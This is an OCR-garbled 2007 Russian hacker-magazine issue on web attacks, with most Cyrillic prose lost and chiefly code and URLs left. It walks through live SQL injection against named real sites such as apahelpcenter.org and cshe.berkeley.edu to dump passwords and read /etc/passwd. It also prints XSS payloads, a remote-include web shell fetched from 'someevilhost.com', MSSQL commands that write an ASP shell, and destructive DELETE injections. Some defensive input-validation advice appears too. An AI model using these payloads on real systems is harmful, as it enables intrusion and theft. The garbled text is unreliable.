Вы находитесь на странице: 1из 117

02(75) 2007


cripting,
S

ss-Site ion
Cro L Inject
SQ

SQL Injection

16


PHP-

34

50
XSS

46

s\`j^
kljnd^
s\`j^\
y

intro
,
. ,
. ,
, ,
,
. .
,
, ,
: ,
. ,

,
IT
.

-, ,

.

: .
, ,
-,
.
, SQL- (SQL Injections)
HTML/JavaScript- (Cross-Site Scripting, XSS)
.
P.S.
e-. ,
, , .
AvaLANche

0 2 |75 | 2 0 0 7
WWW.XAKEP.RU

.
.
,
, .
.


AvaLANche (avalanche@real.xakep.ru)

(nikitin@real.xakep.ru)

Dr.Klouniz (alexander@real.xakep.ru)
(andrusha@real.xakep.ru)


-
(vasin@real.xakep.ru)

(zhukova@real.xakep.ru)

(karamnoff@real.xakep.ru)

(kiselev@real.xakep.ru)

O

(igor@gameland.ru)

(olga@gameland.ru)

E (olgaeml@gameland.ru)
(goryacheva@gameland.ru)
(alekhina@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24


(vladimir@gameland.ru)

(andrey@gameland.ru)

(popov@gameland.ru)

(kosheleva@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24



(nahalova@gameland.ru)
.: (495) 935.70.34 (. 454)



(dmitri@gameland.ru)

(shostak@gameland.ru)

(romanovski@gameland.ru)

(stepanovm@gameland.ru)

(dianova@gameland.ru)

(boris@gameland.ru)

(sidorovsky@gameland.ru)

.: 8 (800) 200-3-999

101000, , , / 652,
spec@real.xakep.ru
ScanWeb,

,

77-12014 4 2002 .
42 000 .
.

Spider_NET
c. 70

vr-online.ru,
mashp (mashp.h10.ru). .
4 ,
Delphi PHP.


c. 72

nezumi. , -8
, .
, W2K, FreeBSD 4.5.
, .


c. 54

MustLive. - 13 , ,
2.
.
. - http://websecurity.com.ua.


c. 72

Horrific. www.vr-online.ru, 11
4 . (
), .

SQL INJECTION

SPECIAL DELIVERY

68

10

70

FAQ

16

RFI-

72

06

SQL Injection

SQL Injection

PHP-

SPEC TOPIC

26

30

34

security-

50
54

78

-
:

web-

84

web-

88


web-

offtopic

XSS

46

22

38

SOFT


web-?

96

ADMINING

98


XSS

HARD

100

58

62

104

66

PERL

112

STORY

Perl

cd:

IV

Brutus AET2

SQL Injection Tools

mod_security

Audacity

SPIKE Proxy

N-Stalker Web

MySQL 5.0.27

Opera 9.10 Final

Wikto 1.63

Application Security

lighttpd 1.4.13

NoClone

Scanner 2006

Enterprise Edition 4

ASP Auditor v2 BETA

Serv-U 6.3.0.1

Advanced Vista

BeEF Browser

SQLite 3.3.11

XSpider 7.5

PHP 5.2.0

Codec Package 4.2.0

Exploitation Framework

Paros Proxy 3.2.13

Shadow Security

Vista Manager 1.0.3

XSS-proxy 0.0.11

Perl 5.8.8

WebScarab

Scanner

XSS Shell

Acunetix Web

Nmap 4.11

Vulnerability Scanner

Pantera 3

CyD Net Utils

Apache 2.2.4

Console

CD-DA
Extractor 10
Portable
AnyReader 1.9.55

WINDOWS
12(73)
WEB-

timeline
2000

{}
,
MSN Korea. , ,
, , ,
Lineage. -

ross-Site Scripting , Microsoft


, . , ,

,
.

2004

Microsoft

Cross-Site Scripting

{ }
,
phpBB (
), , 2004 hpBB.


,
. ,
.
phpBB
phpBB 2.0.11,

phpBB
-,
- . ,

2005
{ }
,

Yafoo! Japan, URL Yahoo!. 20
30 . ,
,
: , ,

,
.
,
.
, ,
.

web-
?
www.securitylab.ru
2006 , 397


cms
(Drupal, XOOPS,
PHP-Nuke )

cms
()
cms
(
cms)

44,84%
18,89%
17,63%
10,08
7,81%

2006

www.securitylab.ru

Mozilla Firefox

Internet Explorer

Safari

Opera

54%
24%
15%
7%

25 Internet Explorer 2006


. Mozilla Firefox 56,
36


. Opera
7 , Safari 16 (www.securitylab.ru/analytics/273335.php).

{Top 20} SANS Institute 20


(Top 20 Security Attack Targets), (www.sans.org/top20/).
Microsoft: Internet Explorer, Office, Windows
Libraries Mac OS X Apple
Unix.
SANS, 40 -
SQL Injection 80
ross-Site Scripting .
:
1 Web-
2
3
4
5
6 DNS-
7

{43%}
-,
PHP
. , 2006
(NIST),
securityfocus.com. 6198 , 2006 , 2690 (
c 43 ) PHP. ,
2005 PHP 29% . , , .
.

06/ 37

06

22

10

26

16 RFI-

30

34

SQL Injection
SQL INJECTION BUGTRAQ. ,
,
,
spider_net (spider_net@inbox.ru)
www.vr-online.ru

SQL Injection
SQL-,
. , . web-
.
SQL Injection
web-
PHP, Perl
AS. , ,

SQL-. web-,
, .
?
, . , , Users, . ,

>

8 02-07

3 . , (=)?

. :

SELECT * FROM Users WHERE id=



1 OR UserName=A,
:
SELECT * FROM Users WHERE id = 1
OR UserName=

: id (), UserName ( ) Password (). ,


, :
SELECT *
FROM Users
WHERE id =
, id .
, , 10, . , ,
:
SELECT *
FROM Users
WHERE id = OR UserName =


id = , ,
UserName = .
.
www.site.ru/profile.php?id=10
OR UserName=
, , URL SQL- (OR UserName=), .
,
SQL Injection! , -
.
( ,
,
) id:
, 0 9.
.
SQL , -

,
.
1 .
. (UserName = '') . ,
,
. , ,
. ,
SQL-.
, . , ,
.
2 . SQL . , ,
. :
SELECT * FROM Users WHERE UserName=root
AND Password=
, UserName root ( ,
-), Password .
, , , .
:
SELECT * FROM Users WHERE UserName=
root--AND Password =
, ,
(AND Password = ), , , , , .
SQL ,
, /*. , ,
/*. . ,
, , ,
.

, id
UserName .
, , .
:
SELECT * FROM Users WHERE id = 1
OR UserName
,
, , .
4 . ; c , . -



SQL Injection

. ,

HTML, -
(, )
.

SQL INJECTION.
SQL-
,
.

, .

, ,
,
- .


.

, ,

.

, .
?
SELECT * FROM Users WHERE id =
, , , id, :

1INSERT. .
(, - , ). , , .

SELECT * FROM Users WHERE UserName=root


and Password=123; INSERT INTO Users
values (0, spider_net, qwerty)

1; DELETE FROM Users


:
SELECT * FROM Users WHERE id = 1;
DELETE FROM Users
Users , id . Users. , ,
,
.
5 . SQL . , ( , ),
.

UserName ,
spider_net qwerty.
2 LIKE. LIKE =,
.
, :
SELECT * FROM Users WHERE UserName LIKE
1 AND Password LIKE
2
LIKE,

%.
, , .

SELECT * FROM Users WHERE id = 1+


OR+UserName=

SELECT * FROM Users WHERE UserName LIKE


root AND Password LIKE %

.
. SQL , ,
,
.

SQL .
, . , .

3 UNION. UNION .
,
. , - (, ), ,
.
UNION.

SELECT * FROM News WHERE id=1 UNION


SELECT Id, UserName, Password FROM Users

UserName.
4 OUTFILE. , , ,
, ?
, SQL
. :
SELECT INTO OUTFILE
text.txt
,
text.txt .
, ,
. , -
SELECT '<?php system($cmd) ?>'
INTO OUTFILE 'cmd.php'
PHP-, $cmd.
, index
( ).

10 02-07

SQL Injection
.
.
,
. ,
.

aka Horrific
http://www.vr-online.ru

, , , .
APA Help Center. ,
google.com ,
URL .php id.
, ,
, , , . APA Help Center (www.apahelpcenter.org). APA? ,
The American Psychological Association .

, - . , : www.apahelpcenter.org/featuredtopics/feature.php. id, .

and 1=0 .
, .
union select 'Test' , Test. - , , . Next page,

Test. . , URL, , :
http://www.apahelpcenter.org/featuredtopics/feature.php?id=38%20and%201=
0%20union%20select%20'Test'--

SQL

11

articles users. , .
? ,
id password.
:
http://www.apahelpcenter.org/featuredtopics/feature.php?id=38%20and%201=
0%20union%20select%20password%20FROM
%20users%20limit%200,1- apanick. :). , , , -
. .
: , /admin/index.php, admin.php .
.
. USA-.
net ,
, , . , SQL Injection.
. www.newspaperads.com. , :
1
2
3

;
USA TODAY;
ASP + MS SQL SERVER.

USA Today Yesterday,


.
:
http://www.newspaperads.com/usatoday/
results.asp?subcatid=1600&interfaceid=82&parent=Categories&subcatname=
Travel+Specials

- . , .
URL 'Test' DATABASE() :
: apahelpcenter
: 4.0.20a-debug
:
prac01web@prac01.apa.org
. ? MySQL . ,

. .
, , .
, ,

. newspaperads.com. : Advertiser, Summary Date. , . ,


subcatid. , ,
. . ,
. , .
,
, SQL-,
. ,
subcatid :
1600)) and 1=0 -

1=0 , .
,
. , .
UNION SELECT NULL,
NULL. 11 .
NULL- , , .
, .
, , . ,
0 11:
1600)) and 1=0 union all select
1,2,3,4,5,6,7,8,9,10,11-, 7 Summary.
, .
,
. INFORMATION_SCHEMA.TABLES.
subcatid:
1600)) and 1=0 union all select
1,2,3,4,5,6,TABLE_NAME,8,9,0,11
from INFORMATION_SCHEMA.TABLES- . ,
20 , 1, 2, 3 , :). .
,
. .
newspaperads.com
:).

12 02-07

The error occurred while processing


an element with a general identifier
of (CFQUERY), occupying document
position (1:1) to (1:59).
, ODBC Microsoft
Access Driver. MS Access. .
,
. , Access
SELECT, FROM . . , ,
users.
URL:
http://www.compostingcouncil.org/
section.cfm?id=29%20union%20select%201%
20from%20users

cold fusion. ,
Macromedia Cold Fusion. .
, (commerce.senate.gov). , . , URL id:
commerce.senate.gov/hearings/
witnesslist.cfm?id=1705
id=1705 and 1=1, . .
, , , . , .
, senate.gov , .

. ,
:).
. www.compostingcouncil.org. - .
,
, .
. :
http://www.compostingcouncil.org/section.cfm
id. , . :
ODBC Error Code = 37000 (Syntax error
or access violation)
[Microsoft][ODBC Microsoft Access
Driver] Syntax error (missing operator)
in query expression 'id = 29'''.

! , , . .
13 . , . ,
users. ,
userid, email memberpwd.
, ,
,
users .
,
. MS Access , MSysObjects,
name . SELECT :
http://www.compostingcouncil.org/
section.cfm?id=29%20union%20select
%201,2,3,4,5,6,name,8,9,10,11,12,13
%20from%20MSysObjects
name . web- ( ).
, , (
). . .
. , www.midwife.com.
. .
, Macromedia ColdFusion .

13

- .
, , .
, MySQL plasmacms. , - CMS
Plasma,
, . , - ,
.
, - . :
SELECT
pageID,pageBody,pageTitle,pageHeader,
pageFooter,pageFolder,pageAccess,pageURL
FROM plasmaContent
WHERE pageID=75'' LIMIT 1
, . ,
plasmaContent, CMS . , ID , , URL , . , ,
. pageURL - URL
, .
, web-, . -
.
SQL- URL:
http://www.midwife.org/news.cfm?id=
75 and 1=0 union select 1,2,3,4,5,6,7,8

: http://www.midwife.org/header.cfm. ,
, .
:
<cfif isDefined("url.id")
and not isDefined("newsPage")>

http://www.midwife.org/header.cfm?id=
75&subHeader=<script>alert('')
</ script>

member, :
1

E-MAIL -

, URL id.
: http://www.midwife.org/header.cfm?id=75. ,
:
<td
class="pageHeader"><cfoutput>#subHeader#
</cfoutput></td>
,
subHeader .
URL, URL :
subHeader=
<h1>Hello%20from%20Horrific
</h1>.
. , Hello
from Horrific.
URL- subHeader.
,
HTML-, JavaScript, XSS. URL,
JavaScript :

8 - ,
URL .

. : .
, ,
. :
C:\Inetpub\wwwroot\Clients\midwife.org\
www\plasmacms\cfm\page.cfc
,
. URL , . ,
. :
C:\Inetpub\wwwroot\Clients\midwife.org\
www\header.cfm

URL,

JAVASCRIPT
COOKIE
.

, XSS.
. , web :).
Berkeley . Berkeley.
! , http://cshe.berkeley.edu/
, . -, . ?
s, url. .

. , ,
. . and
1=1? . , SQL Injection .
, . , , .
, , .
select -

14 02-07

CHAR(60,72,49,62,117,115,101,114,60,47,
72,49,62)
,
:
<h1>user</h1>

. . user ,
<h1>. ,
JavaScript-!
, .
CHAR.
,
MySQL. ?
, , LOAD_FILE,
.
/etc/passwd.
, , ,
:
LOAD_FILE(char(47,101,116,99,47,112,97,
115,115,119,100))

/etc/passwd

, . , URL :
http://cshe.berkeley.edu/publications/
publications.php?s=1%20and%201=1%20union
%20select%201,2,3,4
, ,
, . URL, , 1=1 1=0.
ID 1, ,
.
1
4. ,
, . 1
. , ,
. 2 3 , , , .
, .
URL VERSION(), USER() DATABASE(). , ! ,
,

.
. , , ,
, . MySQL,
?
,
MySQL.
MySQL.user:
http://cshe.berkeley.edu/publications/
publications.php?s=1%20and%201=0%20union
%20select%201,2,3,4%20from%20mysql.user
, ,
MySQL user. .
user
. ?! ,
, mysql.user? . : ,
, .
? ,
MySQL.
CHAR. :

/etc/passwd.
URL
( )
.
. ,
. ?!
,
...
!
. ,
, ,
- ! , ?! -,
.


!

, URL

GamePost

:
Age of Empires III The Warchiefs -
,
,

. Age of Empires III


.

Age of Empires III: The Warchiefs

1400 .

Strategy

:
Khorinis Gothic
1 Gothic 2.
.

.
,
,
.

Gothic 3 (US)

2240 .

Adventure

:
.

, , ,
,
, .
SWAT
SWAT 4.
,
.

SWAT 4

1568 .

Action

!
GamePost

! . .
: +7 (495) 780 88 25 : sales@gamepost.ru

16 02-07

RFI-

/
PHP-
,
, ,
-
WEB-, .
,

, WEB-
C
semuha@mail.ru
. , , ? .

web- , .

.

:
,
-

- .
1

- , ,
.

17

;


.
2 , .

,
;


(/ETC, /BIN, /SBIN,
/ETC/RESOLV.CONF, /ETC/SERVICES,
/ETC/PASSWD ).
3 ,
.
:

;
;
.
4 ,
.
.


WEB- PROXOMITRON ,
HTTP-
.
5

6 GOOGLE
.


, .
Google . ,
- google it!
web-.
Google
: inurl:"index.php?page=".
, , index.php?page= - url.
, , , , page.
.
.
, web- ,
, , www.google.com
page: www.site.com/index.php?page=www.google.com. , google.com, web- .

web. web-.
(Right
Click)! (View
Source) (View) (Source). ,
HTML-. web-,
PHP, Perl, ASP
, , . ,
, .
, web-. , , . , :
<form name="form_name"
action="/[path]/index.php" method="post"
<input type="text" value="" name="user"
maxlength="15" size="25" />
<input type="text" value="" name="pass"
size="25" disabled/>
<input type="submit" value="Login" />
</form>
, , , disabled.
?
,
.
,
index.php . :
<form name="form"
action="http://site_name.com/[path]/
index.php" method="post"
<input type="text" value="" name="user"
maxlength="10" size="20" />
<input type="text" value="" name="pass"
size="20" />
<input type="submit" value="Login" />
</form>

Milw0rm.com

, ,
. web- :).

, .
c PHP. Web-
. .ASP (Active Server Pages), .PHP (PHP
Hypertext Preprocessor) .PL (Perl). PHP- .
PHP .
PHP . PHP
. PHP
.
, , PHP ,
.
RFI-
PHP : include(), include_once(), require(), require_once().
, .
include()/require(). include()



HTTP://RU.PHP.NET

18 02-07

, , , ,
, . ,
, . ,
,
, .
include_once()/require_once(). Include_once()

. include(),
, : ,
. ,
.
require_once() include_once()
include() require().
, ,
.
register_globals. , ,
: register_globals
PHP. , .
, :
sample1.php:
<?php
$var1=sample3;
Include(sample2.php);
echo hello;
#some code ..;
?>
sample2.php:
<?php
Include($var1..php);
#some code ..;
?>

PHP-. include() require()


, . include() (Warning), require() (Fatal Error). ,

,
require(). include() .
include_path
, require() include() .
PATH : , Unix
Windows.

include_path , include_path . , include_path .,


/www/, include/a.php, include sample2.php,
sample2.php /www/, /www/include/.
./ ../, include_path .

sample3.php:
<?php
#some code ..;
?>
, sample1.php sample2.php,
sample2.php sample3.php.
sample1.php
$var1 sample2.php. sample2.php
,

PHP.INI,

-

19

$var1.
: , - sample2.php.
, PHP register_globals. , . $var1
sample2.php, - sample2.php ( sample1.php),
register_globals , $var1
.
, web-
www.vul_site.com/sample1.php, ,
, www.vul_site.com/sample2.php , php.ini, , , , , sample2.php $var1. register_globals ,
: www.vul_site.com/sample2.php?var1=any_file_name.
, .
magic_quotes_gpc. ,
,
, , /etc/passwd:
www.vul_site.com/sample2.php?var1=../../
../../../../../etc/passwd.
.
, sample2.php .php ../../../../../../../etc/passwd.hp, , , . ,
- PHP-, .php.
php.ini magic_quotes_gpc. Magic_quotes_gpc ,
addslashes().
, (',",\
NUL ( NULL)) (\). GPC Get, Post, Cookie. , magic_quotes_gpc addslashes() GET-,
POST-, COOKIE-.
, magic_quotes_gpc off, ,
. PHP
\n, %00.
,
/etc/passwd:
www.vul_site.com/sample2.php?var1=../../../../../../../etc/passwd%00

, ../ aka dot dot slash (Directory


Traversal Specifiers)
.
, .
, evilscript.php :
<?php
passthru($_GET[cmd]);
?>
passthru() PHP . $_GET
.
, evilscript.php
:
http://localhost/index.php?page=http://
someevilhost.com/evilscript.php?
cmd=cat /etc/passwd
-
. ,
. ,
allow_url_fopen off
. , PHP-
. HTTP-GET, PHP-, .
$CODE ='<?php ob_clean();echo
START;$_GET[cmd]=striplashes($_GET[cmd]);
passthru($_GET[cmd]);echo START;die;?>';
$content.="GET /path/".$CODE."
HTTP/1.1/n";
$content.="User-Agent: ".$CODE."/n";
$content.="Host: ".$host."/n";
$content.="Connection: close/n/n";
PHP-
. . , PHP-.
. - PHP-:
, PHP .
. register_globals magic_quotes_gpc.
Horde Kronolith. iDefence
Labs web-

Horde Kronolith,
.
,
. , ,
.

'lib/FBView.php':
177 function &factory($view)
178 {
179 $driver = basename($view);
180 require_once dirname(__FILE__) .
'/FBView/' . $view . '.php';
,
Kronolith_FreeBusy_View::factory,
, 'view' HTTPGET- . 179
basename(string path [, string suffix]) .
, .
suffix, . , basename(),
, $view. -






.

WEB-, FIREFOX,

.
DOM INSPECTOR (TOOLS!WEB DEVELOPMENT!DOM INSPECTOR).
DOM, , ,
.

DOM-
.
DOM-

.
-
DOM

,

.

20 02-07

DOM

180 $driver.
- $view . (../) (%00), web-.
,
, /etc/passwd,
$view :
http://vul_site/path/lib/FBView.php?view=
../../../../../../../../../etc/passwd%00.
, .
web-
. ,
, LFI-/RFI-
.
, -

PHP- .
,
URL, .
.
: : require($page . otherpage.php);. , . , : require(otherpage.php);. ,
index.php?page=otherpage.php ,
: index.php?otherpage.php.
?
, ,
,
\n, ,
\t, \r
. chop()
( rtrim()), .
chop():
<a href=index.php?page=file1.php>Files</a>
<?php
$page = chop($_GET[page]);
include($page);
?>
, . -

PHP- Horde Kronolith

html-, ,
.
JavaScript
PHP htmlspecialchars().
PHP
,
passthru(), web-.
php.ini. , register_globals allow_url_fopen magic_quotes_gpc. , , -
.
. ,
,
require(), include()
PHP-
, . ,
, , ,
XSS- JavaScript- -.
, , . include()
:
Warning: main(%parameter%): failed
to open stream: No such file or directory
in %path% on line %x%
Warning: main(): Failed opening
'%parameter%' for inclusion
(include_path='%path%') in %path%
on line %x%
:
<?php
if(!is_file("My_param"
.$_GET['filename'])){
...
}
?>
,
, :
Warning: main(): Failed opening
My_param for inclusion
(include_path=/whatever/path/
filename.php) in /whatever/path/
filename.php
on line 2
. IT-.







aa















 



8
8
0
0
e
: GTX SLI
Forc
SUS

IA Ge
V ER
D
I
GTS
NV
TSFIELD



N
KE

DVD

4,3







&2





&2




&2)&YMQTS

&228.

;JWXZX,J+TWHJ





 


.SYJQ0JSYXKNJQI
81.
<NSIT\X;NXYF


);)

22 02-07

23


, .
, .

!
aka Crazy_script
script@real.akep.ru

3/5
Void.ru
www.void.ru

4/5
INFOSAFE
www.infosafe.ru

3,5 / 5
Root-Access
www.root-access.org


, INFOSAFE
.

,

.
-

, .


:
,
- .
: , .

-.

IT-security. ,
,

,


.
,

. ,
-
, ,

.

, .
Void.ru
,
.

.

, ,
,
.
,
- :
- , , ,
-. ,
- void.ru.
!

, .

24 02-07

4/5
Viruslist
www.Viruslist.com

5/5
SecurityLab
www.securitylab.ru


, -


:


.



. viruslist.com
-

,
( 27

)
,


. Positive
Technologies ( www.ptsecurity.ru) -,

.

,


IT-security.

,



,
-

,

.
,
IT-.
, ,


. National
Vulnerability Database


20 .

(

)


Security-.
,
.
.
.

.


.


.
SecurityLab
,
. 20
.
,

-
.
:
-
-

CMS.


,

,


.
-
,
-

4,5 / 5
Zone-H
www.zone-h.ru

,


.

6 ,
.


.




-. ,




.
,
. .

:
IT-security
. Zone-H ,

.

25

5/5
BugTraq.Ru
www.bugtraq.ru



.
, (


,
),


. ,
IT.

:

IT, ,

.
BugTraq.ru

( 83 ),

.
1997

-,
, ,
IT-security.
,
,
IT-,


Russian Security
Newsline, HackZone.Ru,
ezhe.ru. ,
BugTraq.ru must visit!

4/5
uinC
www.uinc.ru

4/5

3,5 / 5
Anti-Malware
www.anti-malware.ru

- ,
malware-.

,
ITsecurity. , ,
.


-

,
. : . Anti-Malware
Dr.Web, , ,
Panda Sofware.

www.bezpeka.com


( 2001),
uinC (Underground InformatioN
Center).
,
,
(

).
Network & security
news !

-


.

610


.
uinc.ru
,
,
.

FAQ
IT. (
).

.

RegScan,
UINC Keylogger, PE
Optimizer . , :).

,
, .

, -

.



.
34

, , .
,

,
.

26 02-07

PHP
.
,
, - .
,
.

borisvolfson@gmail.com, http://splendot.com
,
( )
. , , ,

, .
. ? ? , ,

, .
,
.
.
POST
GET. POST,
GET. , , -

.
, :

<a href="show.php?filename=
article1.html"> 1</a>
<a href="show.php?filename=
article2.html"> 2</a>
<a href="show.php?filename=
article3.html"> 3</a>
show.php, ( ).
show.php :

//

echo file_get_contents($filename);
...
//
, :
.
-, (
) $filename. $_REQUEST, $_POST, $_GET
. PHP
,
. -, $filename . ,
index.php

27

PHP5

.

PHP. () PHP

(- ). ,

, , . , , , , . , .
. .
, .
( ).
,
: , , .
.
.
( 1).
.
.
HTML- html.php:

index.php
bio.php

links.php
html.php


HTML
<?php
abstract class HTMLPage
{
protected $Title = "";

function __construct($Title)


(
)

function BeginHTML()
function EndHTML()
function Logo()
function Menu()
abstract function MainText()
function Write()

html-
html-


-
-

function __construct($Title)
{
$this->Title = "[
] " . $Title;
}
function BeginHTML()
{
echo <<<HTML
<html>
<head>
<title>{$this"Title}</title>
</head>
<body>
HTML;
}
function EndHTML()
{
echo <<<HTML
</body>
</html>
HTML;
}
function Logo()
{
echo "<h1>
</h2>";
}
function Menu()
{
echo <<<HTML
<table>
<tr>
<td><a href='index.php'>
</a></td>
<td><a href='bio.php'>
</a></td>
<td><a href='links.php'>
</a></td>
</tr>
</table>
HTML;
}
abstract function MainText();
function Write()
{
$this->BeginHTML();
$this->Logo();
$this->Menu();
$this->MainText();
$this->Menu();
$this->EndHTML();
}
}
?>
,
, .
Write
, -

.
MainText. , ,
. .

,
. , , , .

$Title protected,

, .

. , index.php:

<?php
include_once("html.php");
class IndexPage extends HTMLPage
{
function MainText()
{
echo "<p>
";
}
}
$Page = new IndexPage("
");
$Page->Write();
?>
IndexPage,
HTMLPage
MainText
.
( 2).
. ,
. , .

.
,
HTMLPage, MainText
. .
HTMLPage,
.
.

28 02-07

Component
+Operation()
Component!Operation()

ConcreteComponent
+Operation()

Decorator
+Operations()

ConcreteDecoratorA
-AddedState
+Operation()

Decorator::Operation();
AddedBehavior();

ConcreteDecoratorB
+Operation()
+AddedBehavior()

1.

,
.

- .
: , ,
, .
if (
) .
system(). : system(), . . system
!
, :
*nix- 0, , .
. PHP MySQL ( PostgreSQL).
SQL. , , , , .
SQL ,
.
, , . :
HTML,
< >. ,
. .

. , PHP5
.
,
,
.
, ,
.
. , . , . ? .

, .
, , -

. , , , :
. ,
.
(Gang of Four, GoF)
Decorator. Decorator ,
. , ( 1).
Component (Checker)
, ConcreteComponent (StringChecker)
, . Decorator (Decorator) ,
. ConcreteDecorator (SlashChecker, BackSlashChecker)
( ). (. 1)
:

: ' // '
:

:

:

: '1365m434\'
,
:


(1)
<?php
abstract class Checker //
{
abstract public function Check($StringToCheck); // $StringToCheck
//
// $IsOK == True - ,
// $IsOK == False -
function Result($IsOK)
{
if ($IsOK)
return "<font color='green'> </font><br>";
else
return "<font color='red'> </font><br>";
}
}
class StringChecker extends Checker
//
{
function Check($StringToCheck)
{
echo " : ";
echo $this->Result(strlen($StringToCheck) <= 100);
}
}

29

abstract class Decorator extends Checker


// StringChecker
{
private $MyChecker = null;
//
//
function __construct(Checker $MyChecker)
{
$this->MyChecker = $MyChecker;
}
public function Check($StringToCheck)
// $MyChecker
{
if ($this->MyChecker != null)
$this->MyChecker->Check($StringToCheck);
}
}
class SlashChecker extends Decorator
//
{
public function Check($StringToCheck)
{
echo " : ";
echo $this->Result(!strstr($StringToCheck, '/'));
parent::Check($StringToCheck);
}
}
class BackSlashChecker extends Decorator //
{
public function Check($StringToCheck)
{
echo " : ";
echo $this->Result(!strstr($StringToCheck, '\\'));
parent::Check($StringToCheck);
}
}
// , , ..
class DigitsChecker extends Decorator
{
public function Check($StringToCheck)
{
echo " , : ";
$IsOK = True;
for ($i = 0; $i < strlen($StringToCheck); $i++)
{
if ( ($StringToCheck{$i} < '0') || ($StringToCheck{$i} > '9') )
{
$IsOK = False;
}
}
echo $this->Result($IsOK);
parent::Check($StringToCheck);
}
}
$S1 = " // ";
echo "<b> : '$S1'</b><br>";
$Checker1 = new BackSlashChecker(new SlashChecker(new StringChecker()));
$Checker1->Check($S1);
echo "<br>";
$S2 = "1365m434\\";
echo "<b> : '$S2'</b><br>";
$Checker2 = new DigitsChecker(new BackSlashChecker(new StringChecker()));
$Checker2->Check($S2);
?>

:

:

Checker
, , , . , Check . StringChecker Check
, Decorator MyChecker
.
__construct(Checker $MyChecker)
, .
Checker, Check. Check Decorator $MyChecker!Check($StringToCheck). Check
parent::Check($StringToCheck) (Check
Decorator). , . ,
(, , , ):
$Checker = new DigitsChecker(new
BackSlashChecker(new StringChecker()));
Check:
$Checker->Check($S); // $S

. $Checker DigitsChecker,

, . , Check. Check Decorator
BackSlashChecker::Check, ,
, StringChecker::Check,
.
. ,

, . , .
Decorator
.

Decorator
Check. , , StringChecker::Check, Decorator::Check($StringToCheck) .

30 02-07


-
.
: , SQL
. ,
,


borisvolfson@gmail.com, http://splendot.com

code injection. ,
, ,
.
-, , . -,
, ,
, -

. , Google
. ,
code injection .
: ,
,
.
,
. -, -
include
, -, , . -


:
HTML + PHP
<!- -->
<?php
include ($page);
?>
<!- -->
,
http://tralivali/index.php?page=about.php. , PHP ( ):

31

PHP
<?php
phpinfo();
?>
, about.php
. , .
, PHP
, .
, .
, 3 .
;).
SQL Injection.
SQL. -,
, - . , , -
.

SQL-

JavaScript


SQL-


JavaScript

SQL-

c ,
.
,
SQL-. ,
' OR
'1'='1, . , . ;).
SQL, , , , :

SQL
SELECT * FROM users WHERE username=
'$username'

MSSQL- ActiveX
Advanced SQL Injection In SQL Server Applications

(1)


declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
[ boot.ini]
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
shell
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,
'<% set o = server.createobject("wscript.shell"): o.run(
request.querystring("cmd") ) %>'
[ , ]
declare @o int, @ret int
exec sp_oacreate 'speech.voicetext', @o out
exec sp_oamethod @o, 'register', NULL, 'foo', 'bar'
exec sp_oasetproperty @o, 'speed', 150
exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to,us', 528
waitfor delay '00:00:05'

' OR '1'='1
, . ,
SQL-,
- :
SQL
'; DELETE FROM customers WHERE 1
or username = '
, SQL-. SQL . MySQL, ,
;). :
SELECT- , ,
, MySQL,
!
SQL
SELECT <> FROM <>
INTO OUTFILE '<>';
, .
CMS upload.
.
, MySQL UNION. , .
, :
SQL
SELECT title, description FROM articles
WHERE id=$id;
Title description varchar, $id ,
:
SQL
SELECT title, description FROM articles
WHERE id=123123

32 02-07

Code injection

SQL Injection
XSS

(
-)

UNION
SELECT login, password FROM users;
/*
;
, , Union- .
MS SQL Server .
SQL
. ;).
code injection (: Ten Security Checks for PHP).
readfile, fopen, file, include, require. - ,
.
, , :
PHP
$valid_file = array(
"index.php"
=> "",
"funct.php"
=> "",
"common.php" => "");
if (!isset($valid_files[$page])) {
die("
");
}
, ,
:
PHP
if ( !(eregi("^[a-z_./]*$", $page) &&
!eregi("\\.\\.", $page)) ) {
die("
");
}
allow_url_fopen open_basedir php.ini.
XSS. CMS. 99%
XSS. - -

, XSS (- MySpace).
.

HTML. HTML-
,
WYSIWYG-. , !
;). :
HTML, JavaScript. ,
<script> JavaScript (
, ). , ,
, !

XSS-
. , , ,
,
. ,
,
, .
, , ,
, .
XSS-
(: HTML
Code Injection and Cross-s
site scripting).
. HTML
:

BY EXAMPLE

,
-, .
. , , :). :
.

<script>alert('CSS
Vulnerable')</script>
<img csstest=javascript:alert('CSS
Vulnerable')>
&{alert('CSS Vulnerable')};
,
, .
GET- . ?var=qwerty ( ).
HTML-. '';!--"<CSS_Check>=&{()}. .
<CS_Check> ( ), ,
.
, .
.
. ,
.

,
. ,
,
PHP- ,
JavaScript.

XSS-, SQL-.
SQL- :
PHP-Nuke :). , , , , .
. XSS, SQL,
PHP-. ,
, , ()

: XXX.
XXX , ,
, ;).

.
, , . , , . :
!

: -

,
.


. , . -,
,
.
-,
,
:).
:
Df!2go#_^_7M, .

34 02-07



-
. ,
.
.

borisvolfson@gmail.com http://splendot.com

. ;). , , ,
-
. , HTML. , ,
,
( ). , .
JavaScript, , . , , , e-mail, SQL-,
.

AJAX, .
.
. , , --

,
. ,
.
,
JavaScript.
, .
. - , =).
. ,
.
, , . PHP ( magic quotes).
, ,

DISPLAY_ERRORS = OFF LOG_ERRORS = ON



. , ( 1).
. , . , , .
. POST ,
GET, :
URL
http://www.example.ru/index.php
?variable=value
? ? ,

.
, . ,
PHP, , $_REQUEST
(, ).
, ! ,
? , (
)! -

35

: , ?.
. -,

, , SQL-. -, , XSS .
,
,
. ,
JavaScript, ,
.
,
.
. , ,
, . .
. , ( ,

). PHP is_numeric ,
, .

MAGIC_QUOTES_GPC

, . regexp:
PHP
eregi("^[A-Z0-9._%-]+@[A-Z0-9._%-]+\.
[A-Z]{2,6}$", $email)
,
. , ,
:
.
,
.
PHP
function is_unsigned_integer($val)
{
$val=str_replace
(" ","",trim($val));
return eregi("^([0-9])+$",$val);
}

^([0-9])+$ ( )
, . .
Validate
PEAR, :
PHP
$validate = &new Validate();
